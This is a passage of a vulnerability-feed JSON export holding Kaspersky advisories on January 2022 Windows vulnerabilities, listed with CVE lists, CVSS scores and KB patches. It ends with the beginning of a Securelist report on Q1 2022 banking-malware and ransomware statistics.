\n[CVE-2022-21905](<https://vulners.com/cve/CVE-2022-21905>)5.0Critical \n[CVE-2022-21836](<https://vulners.com/cve/CVE-2022-21836>)7.2High \n[CVE-2022-21900](<https://vulners.com/cve/CVE-2022-21900>)5.0Critical \n[CVE-2022-21880](<https://vulners.com/cve/CVE-2022-21880>)7.8Critical \n[CVE-2022-21883](<https://vulners.com/cve/CVE-2022-21883>)5.0Critical \n[CVE-2022-21833](<https://vulners.com/cve/CVE-2022-21833>)7.2High \n[CVE-2022-21890](<https://vulners.com/cve/CVE-2022-21890>)5.0Critical \n[CVE-2022-21893](<https://vulners.com/cve/CVE-2022-21893>)5.0Critical \n[CVE-2022-21904](<https://vulners.com/cve/CVE-2022-21904>)5.0Critical \n[CVE-2022-21848](<https://vulners.com/cve/CVE-2022-21848>)7.1High \n[CVE-2022-21884](<https://vulners.com/cve/CVE-2022-21884>)5.0Critical \n[CVE-2022-21897](<https://vulners.com/cve/CVE-2022-21897>)5.0Critical \n[CVE-2022-21857](<https://vulners.com/cve/CVE-2022-21857>)9.0Critical \n[CVE-2022-21862](<https://vulners.com/cve/CVE-2022-21862>)6.9High \n[CVE-2022-21899](<https://vulners.com/cve/CVE-2022-21899>)5.0Critical \n[CVE-2022-21885](<https://vulners.com/cve/CVE-2022-21885>)5.0Critical \n[CVE-2022-21914](<https://vulners.com/cve/CVE-2022-21914>)5.0Critical \n[CVE-2022-21843](<https://vulners.com/cve/CVE-2022-21843>)4.3Warning \n[CVE-2022-21916](<https://vulners.com/cve/CVE-2022-21916>)5.0Critical\n\n### *KB list*:\n[5009627](<http://support.microsoft.com/kb/5009627>) \n[5009601](<http://support.microsoft.com/kb/5009601>) \n[5009621](<http://support.microsoft.com/kb/5009621>) \n[5009610](<http://support.microsoft.com/kb/5009610>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-01-11T00:00:00", "type": "kaspersky", "title": "KLA12423 Multiple vulnerabilities in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21838", "CVE-2022-21843", "CVE-2022-21848", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21857", "CVE-2022-21859", "CVE-2022-21862", "CVE-2022-21880", "CVE-2022-21883", "CVE-2022-21884", "CVE-2022-21885", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21893", "CVE-2022-21897", "CVE-2022-21899", "CVE-2022-21900", "CVE-2022-21903", "CVE-2022-21904", "CVE-2022-21905", "CVE-2022-21908", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21925"], "modified": "2022-01-18T00:00:00", "id": "KLA12423", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12423/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-28T14:08:09", "description": "### *Detect date*:\n01/11/2022\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to gain privileges, execute arbitrary code, obtain sensitive information, bypass security restrictions, cause denial of service, spoof user interface.\n\n### *Exploitation*:\nPublic exploits exist for this vulnerability.\n\n### *Affected products*:\nWindows Server, version 20H2 (Server Core Installation) \nWindows 8.1 for x64-based systems \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2022 \nWindows 10 Version 1909 for x64-based Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2012 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2022 (Server Core installation) \nWindows 11 for ARM64-based Systems \nWindows Server 2019 \nWindows 10 Version 1809 for ARM64-based Systems \nWindows Server 2016 \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows Server 2016 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 20H2 for 32-bit Systems \nWindows 10 Version 21H1 for 32-bit Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2012 R2 \nWindows 10 Version 1809 for 32-bit Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 21H1 for x64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 for x64-based Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 Version 21H2 for 32-bit Systems \nWindows 10 Version 21H2 for ARM64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 11 for x64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2012 \nWindows 10 Version 21H2 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows RT 8.1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2022-21860](<https://nvd.nist.gov/vuln/detail/CVE-2022-21860>) \n[CVE-2022-21959](<https://nvd.nist.gov/vuln/detail/CVE-2022-21959>) \n[CVE-2022-21852](<https://nvd.nist.gov/vuln/detail/CVE-2022-21852>) \n[CVE-2022-21859](<https://nvd.nist.gov/vuln/detail/CVE-2022-21859>) \n[CVE-2022-21915](<https://nvd.nist.gov/vuln/detail/CVE-2022-21915>) \n[CVE-2022-21875](<https://nvd.nist.gov/vuln/detail/CVE-2022-21875>) \n[CVE-2022-21908](<https://nvd.nist.gov/vuln/detail/CVE-2022-21908>) \n[CVE-2021-36976](<https://nvd.nist.gov/vuln/detail/CVE-2021-36976>) \n[CVE-2022-21834](<https://nvd.nist.gov/vuln/detail/CVE-2022-21834>) \n[CVE-2022-21864](<https://nvd.nist.gov/vuln/detail/CVE-2022-21864>) \n[CVE-2022-21910](<https://nvd.nist.gov/vuln/detail/CVE-2022-21910>) \n[CVE-2022-21898](<https://nvd.nist.gov/vuln/detail/CVE-2022-21898>) \n[CVE-2022-21922](<https://nvd.nist.gov/vuln/detail/CVE-2022-21922>) \n[CVE-2022-21881](<https://nvd.nist.gov/vuln/detail/CVE-2022-21881>) \n[CVE-2022-21838](<https://nvd.nist.gov/vuln/detail/CVE-2022-21838>) \n[CVE-2022-21867](<https://nvd.nist.gov/vuln/detail/CVE-2022-21867>) \n[CVE-2022-21901](<https://nvd.nist.gov/vuln/detail/CVE-2022-21901>) \n[CVE-2022-21865](<https://nvd.nist.gov/vuln/detail/CVE-2022-21865>) \n[CVE-2022-21850](<https://nvd.nist.gov/vuln/detail/CVE-2022-21850>) \n[CVE-2022-21870](<https://nvd.nist.gov/vuln/detail/CVE-2022-21870>) \n[CVE-2022-21912](<https://nvd.nist.gov/vuln/detail/CVE-2022-21912>) \n[CVE-2022-21913](<https://nvd.nist.gov/vuln/detail/CVE-2022-21913>) \n[CVE-2022-21894](<https://nvd.nist.gov/vuln/detail/CVE-2022-21894>) \n[CVE-2022-21960](<https://nvd.nist.gov/vuln/detail/CVE-2022-21960>) \n[CVE-2022-21879](<https://nvd.nist.gov/vuln/detail/CVE-2022-21879>) \n[CVE-2022-21835](<https://nvd.nist.gov/vuln/detail/CVE-2022-21835>) \n[CVE-2022-21903](<https://nvd.nist.gov/vuln/detail/CVE-2022-21903>) \n[CVE-2022-21964](<https://nvd.nist.gov/vuln/detail/CVE-2022-21964>) \n[CVE-2022-21907](<https://nvd.nist.gov/vuln/detail/CVE-2022-21907>) \n[CVE-2022-21889](<https://nvd.nist.gov/vuln/detail/CVE-2022-21889>) \n[CVE-2022-21866](<https://nvd.nist.gov/vuln/detail/CVE-2022-21866>) \n[CVE-2021-22947](<https://nvd.nist.gov/vuln/detail/CVE-2021-22947>) \n[CVE-2022-21919](<https://nvd.nist.gov/vuln/detail/CVE-2022-21919>) \n[CVE-2022-21851](<https://nvd.nist.gov/vuln/detail/CVE-2022-21851>) \n[CVE-2022-21920](<https://nvd.nist.gov/vuln/detail/CVE-2022-21920>) \n[CVE-2022-21888](<https://nvd.nist.gov/vuln/detail/CVE-2022-21888>) \n[CVE-2022-21868](<https://nvd.nist.gov/vuln/detail/CVE-2022-21868>) \n[CVE-2022-21963](<https://nvd.nist.gov/vuln/detail/CVE-2022-21963>) \n[CVE-2022-21958](<https://nvd.nist.gov/vuln/detail/CVE-2022-21958>) \n[CVE-2022-21928](<https://nvd.nist.gov/vuln/detail/CVE-2022-21928>) \n[CVE-2022-21924](<https://nvd.nist.gov/vuln/detail/CVE-2022-21924>) \n[CVE-2022-21905](<https://nvd.nist.gov/vuln/detail/CVE-2022-21905>) \n[CVE-2022-21836](<https://nvd.nist.gov/vuln/detail/CVE-2022-21836>) \n[CVE-2022-21839](<https://nvd.nist.gov/vuln/detail/CVE-2022-21839>) \n[CVE-2022-21918](<https://nvd.nist.gov/vuln/detail/CVE-2022-21918>) \n[CVE-2022-21900](<https://nvd.nist.gov/vuln/detail/CVE-2022-21900>) \n[CVE-2022-21880](<https://nvd.nist.gov/vuln/detail/CVE-2022-21880>) \n[CVE-2022-21883](<https://nvd.nist.gov/vuln/detail/CVE-2022-21883>) \n[CVE-2022-21882](<https://nvd.nist.gov/vuln/detail/CVE-2022-21882>) \n[CVE-2022-21902](<https://nvd.nist.gov/vuln/detail/CVE-2022-21902>) \n[CVE-2022-21833](<https://nvd.nist.gov/vuln/detail/CVE-2022-21833>) \n[CVE-2022-21877](<https://nvd.nist.gov/vuln/detail/CVE-2022-21877>) \n[CVE-2022-21871](<https://nvd.nist.gov/vuln/detail/CVE-2022-21871>) \n[CVE-2022-21874](<https://nvd.nist.gov/vuln/detail/CVE-2022-21874>) \n[CVE-2022-21890](<https://nvd.nist.gov/vuln/detail/CVE-2022-21890>) \n[CVE-2022-21917](<https://nvd.nist.gov/vuln/detail/CVE-2022-21917>) \n[CVE-2022-21893](<https://nvd.nist.gov/vuln/detail/CVE-2022-21893>) \n[CVE-2022-21904](<https://nvd.nist.gov/vuln/detail/CVE-2022-21904>) \n[CVE-2022-21876](<https://nvd.nist.gov/vuln/detail/CVE-2022-21876>) \n[CVE-2022-21848](<https://nvd.nist.gov/vuln/detail/CVE-2022-21848>) \n[CVE-2022-21847](<https://nvd.nist.gov/vuln/detail/CVE-2022-21847>) \n[CVE-2022-21896](<https://nvd.nist.gov/vuln/detail/CVE-2022-21896>) \n[CVE-2022-21961](<https://nvd.nist.gov/vuln/detail/CVE-2022-21961>) \n[CVE-2022-21887](<https://nvd.nist.gov/vuln/detail/CVE-2022-21887>) \n[CVE-2022-21884](<https://nvd.nist.gov/vuln/detail/CVE-2022-21884>) \n[CVE-2022-21897](<https://nvd.nist.gov/vuln/detail/CVE-2022-21897>) \n[CVE-2022-21857](<https://nvd.nist.gov/vuln/detail/CVE-2022-21857>) \n[CVE-2022-21862](<https://nvd.nist.gov/vuln/detail/CVE-2022-21862>) \n[CVE-2022-21878](<https://nvd.nist.gov/vuln/detail/CVE-2022-21878>) \n[CVE-2022-21858](<https://nvd.nist.gov/vuln/detail/CVE-2022-21858>) \n[CVE-2022-21849](<https://nvd.nist.gov/vuln/detail/CVE-2022-21849>) \n[CVE-2022-21921](<https://nvd.nist.gov/vuln/detail/CVE-2022-21921>) \n[CVE-2022-21906](<https://nvd.nist.gov/vuln/detail/CVE-2022-21906>) \n[CVE-2022-21873](<https://nvd.nist.gov/vuln/detail/CVE-2022-21873>) \n[CVE-2022-21899](<https://nvd.nist.gov/vuln/detail/CVE-2022-21899>) \n[CVE-2022-21885](<https://nvd.nist.gov/vuln/detail/CVE-2022-21885>) \n[CVE-2022-21895](<https://nvd.nist.gov/vuln/detail/CVE-2022-21895>) \n[CVE-2022-21914](<https://nvd.nist.gov/vuln/detail/CVE-2022-21914>) \n[CVE-2022-21861](<https://nvd.nist.gov/vuln/detail/CVE-2022-21861>) \n[CVE-2022-21872](<https://nvd.nist.gov/vuln/detail/CVE-2022-21872>) \n[CVE-2022-21892](<https://nvd.nist.gov/vuln/detail/CVE-2022-21892>) \n[CVE-2022-21869](<https://nvd.nist.gov/vuln/detail/CVE-2022-21869>) \n[CVE-2022-21843](<https://nvd.nist.gov/vuln/detail/CVE-2022-21843>) \n[CVE-2022-21863](<https://nvd.nist.gov/vuln/detail/CVE-2022-21863>) \n[CVE-2022-21916](<https://nvd.nist.gov/vuln/detail/CVE-2022-21916>) \n[CVE-2022-21962](<https://nvd.nist.gov/vuln/detail/CVE-2022-21962>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2022-21860](<https://vulners.com/cve/CVE-2022-21860>)4.4Warning \n[CVE-2022-21959](<https://vulners.com/cve/CVE-2022-21959>)7.2High \n[CVE-2022-21852](<https://vulners.com/cve/CVE-2022-21852>)7.2High \n[CVE-2022-21859](<https://vulners.com/cve/CVE-2022-21859>)6.9High \n[CVE-2022-21915](<https://vulners.com/cve/CVE-2022-21915>)4.0Warning \n[CVE-2022-21875](<https://vulners.com/cve/CVE-2022-21875>)7.2High \n[CVE-2022-21908](<https://vulners.com/cve/CVE-2022-21908>)7.2High \n[CVE-2021-36976](<https://vulners.com/cve/CVE-2021-36976>)4.3Warning \n[CVE-2022-21834](<https://vulners.com/cve/CVE-2022-21834>)7.2High \n[CVE-2022-21864](<https://vulners.com/cve/CVE-2022-21864>)4.4Warning \n[CVE-2022-21910](<https://vulners.com/cve/CVE-2022-21910>)4.6Warning \n[CVE-2022-21922](<https://vulners.com/cve/CVE-2022-21922>)9.0Critical \n[CVE-2022-21881](<https://vulners.com/cve/CVE-2022-21881>)7.2High \n[CVE-2022-21838](<https://vulners.com/cve/CVE-2022-21838>)7.2High \n[CVE-2022-21867](<https://vulners.com/cve/CVE-2022-21867>)6.9High \n[CVE-2022-21901](<https://vulners.com/cve/CVE-2022-21901>)7.7Critical \n[CVE-2022-21865](<https://vulners.com/cve/CVE-2022-21865>)4.4Warning \n[CVE-2022-21850](<https://vulners.com/cve/CVE-2022-21850>)9.3Critical \n[CVE-2022-21870](<https://vulners.com/cve/CVE-2022-21870>)7.2High \n[CVE-2022-21912](<https://vulners.com/cve/CVE-2022-21912>)7.2High \n[CVE-2022-21913](<https://vulners.com/cve/CVE-2022-21913>)5.0Warning \n[CVE-2022-21894](<https://vulners.com/cve/CVE-2022-21894>)4.9Warning \n[CVE-2022-21960](<https://vulners.com/cve/CVE-2022-21960>)7.2High \n[CVE-2022-21879](<https://vulners.com/cve/CVE-2022-21879>)7.2High \n[CVE-2022-21835](<https://vulners.com/cve/CVE-2022-21835>)7.2High \n[CVE-2022-21903](<https://vulners.com/cve/CVE-2022-21903>)7.2High \n[CVE-2022-21964](<https://vulners.com/cve/CVE-2022-21964>)4.9Warning \n[CVE-2022-21889](<https://vulners.com/cve/CVE-2022-21889>)4.3Warning \n[CVE-2022-21866](<https://vulners.com/cve/CVE-2022-21866>)4.4Warning \n[CVE-2021-22947](<https://vulners.com/cve/CVE-2021-22947>)4.3Warning \n[CVE-2022-21919](<https://vulners.com/cve/CVE-2022-21919>)6.9High \n[CVE-2022-21851](<https://vulners.com/cve/CVE-2022-21851>)9.3Critical \n[CVE-2022-21920](<https://vulners.com/cve/CVE-2022-21920>)9.0Critical \n[CVE-2022-21888](<https://vulners.com/cve/CVE-2022-21888>)9.3Critical \n[CVE-2022-21868](<https://vulners.com/cve/CVE-2022-21868>)6.9High \n[CVE-2022-21963](<https://vulners.com/cve/CVE-2022-21963>)7.2High \n[CVE-2022-21958](<https://vulners.com/cve/CVE-2022-21958>)7.2High \n[CVE-2022-21928](<https://vulners.com/cve/CVE-2022-21928>)6.9High \n[CVE-2022-21924](<https://vulners.com/cve/CVE-2022-21924>)5.4High \n[CVE-2022-21905](<https://vulners.com/cve/CVE-2022-21905>)4.9Warning \n[CVE-2022-21836](<https://vulners.com/cve/CVE-2022-21836>)7.2High \n[CVE-2022-21839](<https://vulners.com/cve/CVE-2022-21839>)2.1Warning \n[CVE-2022-21918](<https://vulners.com/cve/CVE-2022-21918>)4.9Warning \n[CVE-2022-21900](<https://vulners.com/cve/CVE-2022-21900>)3.8Warning \n[CVE-2022-21880](<https://vulners.com/cve/CVE-2022-21880>)7.8Critical \n[CVE-2022-21883](<https://vulners.com/cve/CVE-2022-21883>)7.1High \n[CVE-2022-21882](<https://vulners.com/cve/CVE-2022-21882>)7.2High \n[CVE-2022-21902](<https://vulners.com/cve/CVE-2022-21902>)7.2High \n[CVE-2022-21833](<https://vulners.com/cve/CVE-2022-21833>)7.2High \n[CVE-2022-21877](<https://vulners.com/cve/CVE-2022-21877>)4.9Warning \n[CVE-2022-21871](<https://vulners.com/cve/CVE-2022-21871>)7.2High \n[CVE-2022-21890](<https://vulners.com/cve/CVE-2022-21890>)4.3Warning \n[CVE-2022-21917](<https://vulners.com/cve/CVE-2022-21917>)9.3Critical \n[CVE-2022-21893](<https://vulners.com/cve/CVE-2022-21893>)8.5Critical \n[CVE-2022-21904](<https://vulners.com/cve/CVE-2022-21904>)5.0Warning \n[CVE-2022-21876](<https://vulners.com/cve/CVE-2022-21876>)4.9Warning \n[CVE-2022-21848](<https://vulners.com/cve/CVE-2022-21848>)7.1High \n[CVE-2022-21847](<https://vulners.com/cve/CVE-2022-21847>)4.9Warning \n[CVE-2022-21896](<https://vulners.com/cve/CVE-2022-21896>)6.9High \n[CVE-2022-21961](<https://vulners.com/cve/CVE-2022-21961>)7.2High \n[CVE-2022-21887](<https://vulners.com/cve/CVE-2022-21887>)7.2High \n[CVE-2022-21884](<https://vulners.com/cve/CVE-2022-21884>)7.2High \n[CVE-2022-21897](<https://vulners.com/cve/CVE-2022-21897>)7.2High \n[CVE-2022-21857](<https://vulners.com/cve/CVE-2022-21857>)9.0Critical \n[CVE-2022-21862](<https://vulners.com/cve/CVE-2022-21862>)6.9High \n[CVE-2022-21878](<https://vulners.com/cve/CVE-2022-21878>)9.3Critical \n[CVE-2022-21858](<https://vulners.com/cve/CVE-2022-21858>)7.2High \n[CVE-2022-21849](<https://vulners.com/cve/CVE-2022-21849>)9.3Critical \n[CVE-2022-21921](<https://vulners.com/cve/CVE-2022-21921>)4.9Warning \n[CVE-2022-21906](<https://vulners.com/cve/CVE-2022-21906>)2.1Warning \n[CVE-2022-21873](<https://vulners.com/cve/CVE-2022-21873>)7.2High \n[CVE-2022-21899](<https://vulners.com/cve/CVE-2022-21899>)4.9Warning \n[CVE-2022-21885](<https://vulners.com/cve/CVE-2022-21885>)7.2High \n[CVE-2022-21895](<https://vulners.com/cve/CVE-2022-21895>)7.2High \n[CVE-2022-21914](<https://vulners.com/cve/CVE-2022-21914>)7.2High \n[CVE-2022-21861](<https://vulners.com/cve/CVE-2022-21861>)7.2High \n[CVE-2022-21872](<https://vulners.com/cve/CVE-2022-21872>)7.2High \n[CVE-2022-21892](<https://vulners.com/cve/CVE-2022-21892>)7.2High \n[CVE-2022-21869](<https://vulners.com/cve/CVE-2022-21869>)7.2High \n[CVE-2022-21843](<https://vulners.com/cve/CVE-2022-21843>)4.3Warning \n[CVE-2022-21863](<https://vulners.com/cve/CVE-2022-21863>)6.9High \n[CVE-2022-21916](<https://vulners.com/cve/CVE-2022-21916>)7.2High \n[CVE-2022-21962](<https://vulners.com/cve/CVE-2022-21962>)7.2High\n\n### *KB list*:\n[5009585](<http://support.microsoft.com/kb/5009585>) \n[5009546](<http://support.microsoft.com/kb/5009546>) \n[5009557](<http://support.microsoft.com/kb/5009557>) \n[5009586](<http://support.microsoft.com/kb/5009586>) \n[5009543](<http://support.microsoft.com/kb/5009543>) \n[5009619](<http://support.microsoft.com/kb/5009619>) \n[5009555](<http://support.microsoft.com/kb/5009555>) \n[5009595](<http://support.microsoft.com/kb/5009595>) \n[5009566](<http://support.microsoft.com/kb/5009566>) \n[5009545](<http://support.microsoft.com/kb/5009545>) \n[5009624](<http://support.microsoft.com/kb/5009624>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T00:00:00", "type": "kaspersky", "title": "KLA12422 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22947", "CVE-2021-36976", "CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21838", "CVE-2022-21839", "CVE-2022-21843", "CVE-2022-21847", "CVE-2022-21848", "CVE-2022-21849", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21852", "CVE-2022-21857", "CVE-2022-21858", "CVE-2022-21859", "CVE-2022-21860", "CVE-2022-21861", "CVE-2022-21862", "CVE-2022-21863", "CVE-2022-21864", "CVE-2022-21865", "CVE-2022-21866", "CVE-2022-21867", "CVE-2022-21868", "CVE-2022-21869", "CVE-2022-21870", "CVE-2022-21871", "CVE-2022-21872", "CVE-2022-21873", "CVE-2022-21874", "CVE-2022-21875", "CVE-2022-21876", "CVE-2022-21877", "CVE-2022-21878", "CVE-2022-21879", "CVE-2022-21880", "CVE-2022-21881", "CVE-2022-21882", "CVE-2022-21883", "CVE-2022-21884", "CVE-2022-21885", "CVE-2022-21887", "CVE-2022-21888", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21892", "CVE-2022-21893", "CVE-2022-21894", "CVE-2022-21895", "CVE-2022-21896", "CVE-2022-21897", "CVE-2022-21898", "CVE-2022-21899", "CVE-2022-21900", "CVE-2022-21901", "CVE-2022-21902", "CVE-2022-21903", "CVE-2022-21904", "CVE-2022-21905", "CVE-2022-21906", "CVE-2022-21907", "CVE-2022-21908", "CVE-2022-21910", "CVE-2022-21912", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21917", "CVE-2022-21918", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21921", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21928", "CVE-2022-21958", "CVE-2022-21959", "CVE-2022-21960", "CVE-2022-21961", "CVE-2022-21962", "CVE-2022-21963", "CVE-2022-21964"], "modified": "2023-09-28T00:00:00", "id": "KLA12422", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12422/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2022-05-30T13:56:48", "description": "\n\n * [IT threat evolution in Q1 2022](<https://securelist.com/it-threat-evolution-q1-2022/106513/>)\n * **IT threat evolution in Q1 2022. Non-mobile statistics**\n * [IT threat evolution in Q1 2022. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q1-2022-mobile-statistics/106589/>)\n\n_These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q1 2022:\n\n * Kaspersky solutions blocked 1,216,350,437 attacks from online resources across the globe.\n * Web Anti-Virus recognized 313,164,030 unique URLs as malicious.\n * Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 107,848 unique users.\n * Ransomware attacks were defeated on the computers of 74,694 unique users.\n * Our File Anti-Virus detected 58,989,058 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q1 2022 Kaspersky solutions blocked the launch of at least one piece of malware designed to steal money from bank accounts on the computers of 107,848 unique users.\n\n_Number of unique users attacked by financial malware, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231205/01-en-malware-report-q1-2022-pc.png>))_\n\n#### Geography of financial malware attacks\n\n_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country and territory we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country or territory._\n\n_Geography of financial malware attacks, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231231/02-en-malware-report-q1-2022-pc.png>))_\n\n**TOP 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 4.5 \n2 | Afghanistan | 4.0 \n3 | Tajikistan | 3.9 \n4 | Yemen | 2.8 \n5 | Uzbekistan | 2.4 \n6 | China | 2.2 \n7 | Azerbaijan | 2.0 \n8 | Mauritania | 2.0 \n9 | Sudan | 1.8 \n10 | Syria | 1.8 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\n#### TOP 10 banking malware families\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | Ramnit/Nimnul | Trojan-Banker.Win32.Ramnit | 36.5 \n2 | Zbot/Zeus | Trojan-Banker.Win32.Zbot | 16.7 \n3 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 6.7 \n4 | SpyEye | Trojan-Spy.Win32.SpyEye | 6.3 \n5 | Gozi | Trojan-Banker.Win32.Gozi | 5.2 \n6 | Cridex/Dridex | Trojan-Banker.Win32.Cridex | 3.5 \n7 | Trickster/Trickbot | Trojan-Banker.Win32.Trickster | 3.3 \n8 | RTM | Trojan-Banker.Win32.RTM | 2.7 \n9 | BitStealer | Trojan-Banker.Win32.BitStealer | 2.2 \n10 | Danabot | Trojan-Banker.Win32.Danabot | 1.8 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\nOur TOP 10 leader changed in Q1: the familiar ZeuS/Zbot (16.7%) dropped to second place and Ramnit/Nimnul (36.5%) took the lead. The TOP 3 was rounded out by CliptoShuffler (6.7%).\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\n#### Law enforcement successes\n\n * Several members of the REvil ransomware crime group were [arrested](<https://tass.com/society/1388613>) by Russian law enforcement in January. The Russian Federal Security Service (FSB) [says](<http://www.fsb.ru/fsb/press/message/single.htm!id=10439388%40fsbMessage.html>) it seized the following assets from the cybercriminals: &quot;more than 426 million rubles ($5.6 million) including denominated in cryptocurrency; $600,000; 500,000 euros; computer equipment, the crypto wallets that were used to perpetrate crimes, and 20 luxury cars that were purchased with illicitly obtained money.&quot;\n * In February, a Canadian citizen was [sentenced](<https://www.bleepingcomputer.com/news/security/netwalker-ransomware-affiliate-sentenced-to-80-months-in-prison/>) to 6 years and 8 months in prison for involvement in NetWalker ransomware attacks (also known as Mailto ransomware).\n * In January, Ukrainian police [arrested](<https://www.bleepingcomputer.com/news/security/ukranian-police-arrests-ransomware-gang-that-hit-over-50-firms/>) a ransomware gang who delivered an unclarified strain of malware via e-mail. According to the statement released by the police, over fifty companies in the United States and Europe were attacked by the cybercriminals.\n\n#### HermeticWiper, HermeticRansom and RUransom, etc.\n\nIn February, new malware was discovered which carried out attacks with the aim of destroying files. Two pieces of malware \u2014 a Trojan called HermeticWiper that destroys data and a cryptor called [HermeticRansom](<https://securelist.com/elections-goransom-and-hermeticwiper-attack/105960/>) \u2014 were both [used](<https://www.kaspersky.com/blog/hermeticransom-hermeticwiper-attacks-2022/43825/>) in cyberattacks in Ukraine. That February, Ukrainian systems were attacked by another Trojan called IsaacWiper, followed by a third Trojan in March called CaddyWiper. The apparent aim of this malware family was to render infected computers unusable leaving no possibility of recovering files.\n\nAn intelligence team later discovered that HermeticRansom only superficially encrypts files, and ones encrypted by the ransomware [can be decrypted](<https://threatpost.com/free-hermeticransom-ransomware-decryptor-released/178762/>).\n\nRUransom malware was 